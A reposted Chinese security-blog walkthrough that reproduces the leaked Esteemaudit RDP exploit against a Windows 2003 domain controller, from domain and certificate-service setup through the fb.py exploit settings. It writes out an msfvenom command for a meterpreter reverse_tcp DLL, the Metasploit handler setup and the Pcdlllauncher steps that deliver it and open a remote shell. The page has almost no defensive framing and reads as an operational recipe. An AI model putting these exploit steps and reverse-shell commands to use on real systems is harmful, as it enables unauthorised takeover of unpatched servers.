Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

0
0
【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

2017-06-26 15:15:19

阅读:1102次
点赞(0)
收藏
来源: 安全客





【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

作者:河马安全网





【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

译者:河马安全网

预估稿费:350RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿


说起这个溢出是够震撼的,但是我测试的时候是有条件溢出的,就是服务器必须是域控主机,而且是和智能卡功能相关的漏洞,要不然不知道会有多少台服务器遭殃。

在我第一次测试的时候,由于没有配置域导致失败,后来在配置windows 2003 域的时候,由于各种原因,域没有配置成功,没办法往下测试,索性安装一台新的windows来测,这次就好了,成功溢出,现在分享一下过程。

第一步,在windows 2003 上安装AD活动目录。如图1,图2,图3


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图1


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图2


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图3

第二步,安装IIS,.NET服务,如图4,图5


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图4


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图5

第三步,在Windows组件中安装”证书服务”,如图6,图7,图8


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图6


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图7


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图8

第四步,打开“证书颁发机构”,如图9,图10


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图9


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图10

将“注册代理”和“智能卡用户“添加至模板中。如图11,图12


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图11


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图12

第五步,在” Active Directory 用户和计算机”中添加test用户,密码为www.isafe.cc, 如图13,图14,图15


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图13


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图14


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图15

第六步,在IE里访问http://127.0.0.1/certsrv,使用域管理员账号登录 如图16


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图16

依次“申请一个证书”->“高级证书申请”->“创建并向此 CA 提交一个申请”->“注册代理”->“提交”,如图17,图18,图19,图20


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图17


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图18


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图19


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图20

依次“申请一个证书”->“高级证书申请”->“通过使用智能卡证书注册站来为另一用户申请一个 智能卡证书” ->“注册代理”->“提交”,如图21,图22,图23,图24


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图21


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图22


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图23


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图24

到了这里,无法进行下去了,IE6.0有安全设置,不过不是没办法,我通过IIS里的浏览器就可以了,如图25

(提示:这里的IE6.0安全设置 可以:通过在 开始菜单-控制面板-添加或删除程序-添加/删除Windows组件 中把Internet explorer增强的安全配置取消勾选然后点击”下一步”进行删除即可)


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图25

上面是域服务器配置的相关步骤,完成后,我们登录3389端口,会看到又多了一个选项,如图26,表示配置成功。


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图26

现在开始步入正题,本次溢出漏洞使用的是shadowbroker提供的工具,环境方面使用

python2.6.6 pywin32

其它没什么特别要求,运行fb.py,如图27


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图27

这里设置被攻击的服务器IP,和我的IP地址,重定向选择no,如图28


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图28

到了这里,我们新建一个项目,选择0,项目名称为test1,如图29


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图29

这是全局变量设置,下面要使用一个PoC来攻击了,执行use Esteemaudit,载入3389端口溢出模块,这个和metasploit差不多,如图30


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图30

按照提示,Target IP为192.168.1.102 Target Port为3389,如图31


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图31

保持默认并且一路回车,到这里,如图32


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图32

输入Yes然后回车,如图33


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图33

输入Yes,回车,如图34


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图34

到这里大家注意把这三个dll的地址改成fb.py目录下的这个三个dll的地址,不可以用默认的地址


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

一路回车,到这里


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

RdpLibHertz这里输入71,回车继续,设置如图35,


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图35

CallBackLocalPort设置为7980,如图36


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图36

一直回车到这里


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

一直回车,到这里


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

输入Yes继续


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

可爱的Success出现了,溢出成功了。

成功溢出后,我们只是把一个后门安装在目标机上了,要shell的话,还需要metasploit的配合,使用msfvenom生成一个dll类型的Payload,命令如下:

msfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.1.103LPORT=4444-fdll>/tmp/rdp.dll 执行后如图37,

【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图37

把生成的rdp.dll放在C盘根目录下,现在使用metasploit打开一个监听器,metasploit所在的主机IP为192.168.1.103,刚好是Payload的反弹IP,打开监听器的命令为:

msf>useexploit/multi/handler msfexploit(handler)>setlhost192.168.1.103 msfexploit(handler)>setlport4444 msfexploit(handler)>setPAYLOADwindows/meterpreter/reverse_tcp msfexploit(handler)>run

如图38


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图38

回到fb.py中,我们现在要把Payload发送到windows 2003服务器上去,使用Pcdlllauncher模块,如图39,图40


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图39


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图40

LPFilename 改成实际的PC_Exploit.dll地址,不能用默认的地址


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

输入Yes,一路回车,到了这里


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

输入C:\rdp.dll,回车,如图41


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

图41


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

其它的不需要动,输入Yes后,回车,我们的shell完美的出现了,


【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)

整个过程也没什么别的新意,只是windows rdp开启的不少,只要是win2003域主机,基本上是逃不过的,如今用windows 2003的人越来越少了,不过内网就不知道了。




【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)
【技术分享】全面复现Esteemaudit利用过程(含域环境搭建过程)
本文由 安全客 原创发布,如需转载请注明来源及本文地址。
本文地址:http://bobao.360.cn/learning/detail/4021.html

Viewing all articles
Browse latest Browse all 12749

Latest Images

Trending Articles





Latest Images